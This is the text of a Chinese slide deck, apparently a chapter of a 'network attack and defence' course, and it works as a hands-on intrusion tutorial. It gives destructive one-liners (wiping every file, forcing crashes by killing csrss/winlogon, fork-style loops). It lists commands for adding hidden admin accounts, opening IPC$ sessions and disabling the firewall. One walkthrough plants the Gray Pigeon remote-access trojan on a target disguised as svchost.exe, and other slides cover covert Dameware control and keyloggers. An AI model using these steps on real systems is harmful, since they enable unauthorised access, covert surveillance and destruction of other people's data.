网络安全攻防技术教程.ppt

网络入侵基础知识、 入侵实战,第2章,李冰川 QQ：594520163 Email：,Page 2,章节目标,常用的DOS命令 常用的入侵命令 Hack实战一：命令行下的入侵 Hack实战二：图形界面的入侵 流行远程控制木马的使用方法 键盘记录程序的使用方法,Page 3,常用DOS命令1,Cd 切换目录 Dir 列出所有文件信息 Del 删除文件 Md 创建目录 Rd删除目录 Copy 复制 Xcopy 复制文件和文件夹 Cls 清屏 Attrib 修改文件、文件夹属性 Date、Time显示日期、时间,Page 4,常用DOS命令2,Path 系统路径 Set 显示、设置系统信息 Ren(Rename)重命名 Subst 虚拟磁盘 Ver 显示操作系统版本 Help 帮助 /? 显示某条命令的帮助,Page 5,非主流DOS命令1,1.重复执行某条命令直至死机的批处理代码： start cmd %0 2.复制一个文件的磁盘的每个子文件夹当中： for /r /d %a in (*) do copy test.txt “%a“ /y 3.不停地执行同一条命令： for /l %a in (1,0,2) do net send “炸弹来了！“ 4.死机,蓝屏 ntsd -c q -pn winlogon.exe ntsd -c q -pn csrss.exe,Page 6,非主流DOS命令2,5.删除磁盘所有文件： del * /a /s /q /f 6.创建名字为空的文件夹： md (按住Alt键，在小键盘上按2,5,5,然后松开Alt,回车) 7.创建无法删除的特殊名字文件夹： md .c:con md .c:aux 8.创建无法双击打开无法删除的另类文件夹： md test rd test /s /d,Page 7,常用入侵命令1,net user 用户名 密码 /add (建立用户) net localgroup administrators 用户名 密码 /add (将用户加到管理员，使其拥有管理权限) net user guest /active:Yes (激活guest用户) net user guest 12345 (修改guest密码为12345) net user (查看账号属性) net use ipipc$ “” /user (建立空IPC连接) net use ipipc$ “密码” /user:“用户名” (建立IPC非空连接，非空链接就是需要帐户和密码) net use ipipc$ /del (删除IPC空连接) net use z: c$(映射目标主机磁盘c盘到本地磁盘Z盘),Page 8,常用入侵命令2,net start (查看开启了哪些服务) net start 服务名 (开启服务) net time 目标IP (查看对方时间) net view (查看局域网中开启了哪些共享) net share (查看本地开启的哪些共享) net share C$/del (删除C盘默认共享) netstat -an (查看计算机开放了哪些端口) Copy xx.exeipadmin$System32 (将当前xx.exe复制到对方Admin$共享的System32目录内),Page 9,常用入侵命令3,sc config tlnesvr start= auto(修改telnet服务的启动方式为自动，auto前面有一个空格) net stop sharedaccess(关闭系统自带的防火墙) net send IP 消息(利用messenger服务向目标IP发送消息) ntsd -c q -pn winlogon.exe(蓝屏重启) ntsd -c q -pn csrss.exe(死机) tasklist(查看进程) taskkill(结束进程),Page 10,实战：纯DOS命令入侵,net use 0ipc$ “123” /user:”administrator” net time 0 Copy c:server.exe 0admin$svchost.exe At 0 12:00 start c:windowssvchost.exe 这样，对方就中了灰鸽子服务端了。,Page 11,几个小例子,开启禁用的telnet服务： sc config tlntsvr start= auto(auto前有空格) 开启3389远程终端 reg add 开启C盘默认共享 net share c$=c: 开启计划任务服务（at命令需要这一服务） net start schedule 开启远程注册表(Remote Registry)服务 net start remoteregistry,Page 12,图形界面入侵,一、计算机管理 操作菜单连接到另一台计算机 二、注册表编辑器 文件菜单连接网络注册表 三、第三方工具比如Dameware、Pcanywhere,Dameware的使用方法,Page 13,Dameware的隐藏,用Dameware控制对方，要做到悄无声息，需要注意以下几点： 点帮助菜单激活软件，输入注册码注册软件； 在远程连接对话框上单击“设置”，勾选： “查看模式”和“显示远程鼠标指针”； 切换到“安装选项”选项卡，勾选上“复制配置文件”然后点“编辑”： 把“附加设置”选项卡上“允许托盘图标”勾掉 再把“通知对话”选项卡上“连接时通知”勾掉。,Page 14,XP默认不能远程控制的原因,在运行中输入命令secpol.msc打开安全策略 展开“本地策略”“安全选项” (红色表示默认选项) “安全选项：本地账户的共享和安全模式” 经典，表示在远程可以拥有管理员权限 仅来宾，表示在远程只能拥有guest权限 “账户：使用空白密码的账户只允许进行控制台登录” 启用，账户密码为空则不允许远程访问 禁用，账户密码为空也允许远程访问 所以，要想控制系统为XP的计算机，必须考虑对方安全策略的设置 安全策略的设置不影响利用木马进行控制,Page 15,灰鸽子,以华夏灰鸽子2009为例，注意事项： IP地址栏一定要填写自己的IP地址，而且不要忘了加上冒号和端口号,Page 16,PcShare,使用方法和灰鸽子类似,Page 17,键盘记录,以“keyghost”和“简单键盘记录程序”为例,Page 18,实验任务,练